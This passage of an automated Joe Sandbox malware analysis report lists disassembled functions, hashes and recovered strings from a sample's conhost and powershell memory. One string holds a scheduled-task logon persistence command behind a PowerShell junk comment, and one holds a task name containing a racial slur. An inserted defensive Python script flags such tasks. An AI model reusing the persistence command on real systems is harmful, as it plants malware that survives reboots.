                                                                                        • Instruction Fuzzy Hash: FD410A20E1A54346FA7A326E449137911C19F9AB2CF2D8635D72DDB3F3DFDCA8805222
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryVirtual
                                                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                        • API String ID: 1804819252-1534286854
                                                                                        • Opcode ID: a6d9122e00c00e9fac281b6b2975abf14a44b6093c547a3eb042b90889feb3c8
                                                                                        • Instruction ID: bdff691ec4e47099ea8e07cfe2d28f63a4224d2fc883619b3741bf241b9fb93d
                                                                                        • Opcode Fuzzy Hash: a6d9122e00c00e9fac281b6b2975abf14a44b6093c547a3eb042b90889feb3c8
                                                                                        • Instruction Fuzzy Hash: BD61B272B0964386E712AF1AE84027977E0AB88B98F444135EF4D877A6EF7CE551C310
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fwprintf
                                                                                        • String ID: %*.*S$%-*.*S$%.*S
                                                                                        • API String ID: 968622242-2115465065
                                                                                        • Opcode ID: 575a4e86318dea34aa8239c07f2f226d86714703114f2fb89409e6163cbfb4b8
                                                                                        • Instruction ID: 6a81308bde8b101efb46b6974a81a80fce7c6741a577fd4aa182c72c6bd63cb6
                                                                                        • Opcode Fuzzy Hash: 575a4e86318dea34aa8239c07f2f226d86714703114f2fb89409e6163cbfb4b8
                                                                                        • Instruction Fuzzy Hash: 4E41A363A1864345F752AA2ED4006B962E1AB84BD8F1C8139DF4D8F6C7DEBCE5418B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %*.*s$%-*.*s$%.*s$%S <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest
                                                                                        • API String ID: 0-3540679199
                                                                                        • Opcode ID: 8e66d3840af80ef5d14195085cc5a232f355be66654e25f5e7f11b77a63d9f47
                                                                                        • Instruction ID: ce7c418eefe3d78a2337f7be85ee221e0cda8859bb7b215c29f30234636a0884
                                                                                        • Opcode Fuzzy Hash: 8e66d3840af80ef5d14195085cc5a232f355be66654e25f5e7f11b77a63d9f47
                                                                                        • Instruction Fuzzy Hash: 71419072A0864786E761AE2ED40027977D5EB40BDCF1CC134DF4D8E687EEBDA5418B10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcscatwcscpywcslen
                                                                                        • String ID: \??\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MINEINEYNIGGA
                                                                                        • API String ID: 468205783-1300384374
                                                                                        • Opcode ID: 7b0665e4b0d3bccd0e4723797bbdb633f523b570014c4a6b6fd98894cae72738
                                                                                        • Instruction ID: 9988fbd50b184f1a67178a1e64641e79ed38e799bce10748dbfd2bcc3004cb26
                                                                                        • Opcode Fuzzy Hash: 7b0665e4b0d3bccd0e4723797bbdb633f523b570014c4a6b6fd98894cae72738
                                                                                        • Instruction Fuzzy Hash: BD31741191978349F712AF2AE84137933E0AF9579CF048235DA4C9AAA3DFBCA195C309
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
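The two string artifacts above (the schtasks /create /f /sc onlogon /rl highest fragment behind a junk <#...#> PowerShell comment block, and the TaskCache\Tree\MINEINEYNIGGA registry path) point at logon-task persistence. The following triage check is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It runs detection logic over constructed schtasks /query /v /fo CSV output (a reduced, constructed subset of the real verbose columns) and flags logon tasks that run from a user-writable path, launch PowerShell with encoded or junk-comment arguments, or carry the task name recovered from the report. The task names, paths and host name in the sample are constructed, and the English "At logon time" schedule label is an assumption about locale.

```python
"""Triage check for logon-task persistence (added example, not report code)."""
import csv
import io
import re

# Task name recovered from the report's TaskCache\Tree registry string.
REPORTED_TASK_NAME = "MINEINEYNIGGA"

# Label that schtasks /query /v prints for /sc onlogon tasks (assumption: English locale).
LOGON_SCHEDULE = "At logon time"

# Directories an unprivileged user can write to; a logon task pointing here is suspect.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp|AppData)\\", re.IGNORECASE)

# PowerShell launched with an encoded command or a junk <#...#> comment block,
# the obfuscation pattern visible in the report's string.
OBFUSCATED_PS = re.compile(r"powershell(\.exe)?\b.*(<#|-enc(odedcommand)?\b|-e\s)", re.IGNORECASE)

# Constructed sample: a reduced subset of the columns schtasks /query /v /fo CSV emits.
SAMPLE_SCHTASKS_CSV = r'''
"HostName","TaskName","Status","Author","Task To Run","Run As User","Schedule Type"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Weekly"
"WS01","\MINEINEYNIGGA","Ready","WS01\user","C:\Users\user\AppData\Roaming\svc\updater.exe","user","At logon time"
"WS01","\Adobe Acrobat Update Task","Ready","Adobe","""C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe""","user","At logon time"
"WS01","\OneDrive Sync","Ready","WS01\user","powershell.exe -W Hidden <#kbbksn#> $null","user","At logon time"
'''


def parse_schtasks_csv(text):
    """Parse verbose schtasks CSV output into a list of column->value dicts."""
    rows = []
    for row in csv.DictReader(io.StringIO(text.strip())):
        # Defensive: drop any repeated header rows that appear in the body.
        if row.get("TaskName") == "TaskName":
            continue
        rows.append(row)
    return rows


def suspicious_reasons(task):
    """Return the list of reasons a task looks like malicious persistence (empty if clean)."""
    reasons = []
    leaf_name = task["TaskName"].rsplit("\\", 1)[-1]
    if leaf_name.upper() == REPORTED_TASK_NAME:
        reasons.append("task name matches the report's TaskCache\\Tree string")
    if task.get("Schedule Type", "").strip() == LOGON_SCHEDULE:
        action = task.get("Task To Run", "")
        if USER_WRITABLE.search(action):
            reasons.append("logon task runs from a user-writable directory")
        if OBFUSCATED_PS.search(action):
            reasons.append("logon task launches PowerShell with encoded or junk-comment arguments")
    return reasons


def hunt(text):
    """Map each flagged TaskName to its reasons; tasks with no findings are omitted."""
    findings = {}
    for task in parse_schtasks_csv(text):
        reasons = suspicious_reasons(task)
        if reasons:
            findings[task["TaskName"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_SCHTASKS_CSV).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

On a live host, feed the output of `schtasks /query /v /fo CSV` to `hunt()` instead of the constructed sample; the name match is the narrow indicator from this report, while the path and PowerShell heuristics catch the same persistence technique under a different task name.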

                                                                                        APIs
                                                                                        • VirtualProtect.KERNEL32(00007FF6B29948F8,00007FF6B29948F0,00007FF6B2993DC0,00007FF8C6F6ADA0,?,?,?,00000001,00007FF6B297124C), ref: 00007FF6B297D97D
                                                                                          • Part of subcall function 00007FF6B297D5C0: VirtualQuery.KERNEL32 ref: 00007FF6B297D66B
                                                                                        Strings
                                                                                        • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6B297DB22
                                                                                        • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6B297DB13
                                                                                        • Unknown pseudo relocation bit size %d., xrefs: 00007FF6B297DAFA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$ProtectQuery
                                                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                        • API String ID: 1027372294-1286557213
                                                                                        • Opcode ID: d6c8e89c0488428606cb2e8003e922a342307a1c96a15d80c0e1811b70fcf3a2
                                                                                        • Instruction ID: 4b58318269e2109197a8f03c0638dc41b8a38b67f4745399ac80cad4ed2fef75
                                                                                        • Opcode Fuzzy Hash: d6c8e89c0488428606cb2e8003e922a342307a1c96a15d80c0e1811b70fcf3a2
                                                                                        • Instruction Fuzzy Hash: D891D321F1A54386EA22AB2BD44067923E0BF45FACF544235DA1D977EADF7CE441C720
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: freememcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2208669145-0
                                                                                        • Opcode ID: 8e37fd4144fb27c017fba0f4012ca99b5eb31d3c4b64029982dfb59845ed7414
                                                                                        • Instruction ID: 97d47f90e080e75d73eddfc1f7df0f2b8b06f1d7a5fc759a5ee32346a417df54
                                                                                        • Opcode Fuzzy Hash: 8e37fd4144fb27c017fba0f4012ca99b5eb31d3c4b64029982dfb59845ed7414
                                                                                        • Instruction Fuzzy Hash: A331CB22A1F64341F9677A1F6A0037956D06F95FE8F184230DF5D8ABE6DFBCE4428220
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Byte$CharLeadMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 2561704868-0
                                                                                        • Opcode ID: 72e5182a53e13fa889d886ff83eae27f3b77cb04a3f3d9c06ddc89f4c59f6935
                                                                                        • Instruction ID: 34a8cadda64696b6b8cbc6806c3c7fa100aeabc667f47aa6352adfc35c6be373
                                                                                        • Opcode Fuzzy Hash: 72e5182a53e13fa889d886ff83eae27f3b77cb04a3f3d9c06ddc89f4c59f6935
                                                                                        • Instruction Fuzzy Hash: 0431B972A0C2828AE7625B2AB4003AD76D0BB947D8F584135EB9CCF7D6CFBDD4458B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcslen
                                                                                        • String ID: 0$@
                                                                                        • API String ID: 4088430540-1545510068
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: strlen
                                                                                        • String ID: this${parm#$}
                                                                                        • API String ID: 39653677-3278767634
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: wcslen
                                                                                        • String ID: 0$@
                                                                                        • API String ID: 4088430540-1545510068
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: wcslen
                                                                                        • String ID: 0$@$eth
                                                                                        • API String ID: 4088430540-2562130303
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-3474627141
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-4064033741
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-2187435201
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-2468659920
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-4273532761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-4283191376
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-2713391170
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeavefree
                                                                                        • String ID:
                                                                                        • API String ID: 4020351045-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2397714858.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p/%I
                                                                                        • API String ID: 0-2660849550
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2397714858.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p/%I
                                                                                        • API String ID: 0-2660849550
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2396929367.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2395218973.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848e0d000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2396929367.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2396929367.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2396929367.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2397714858.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2397714858.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%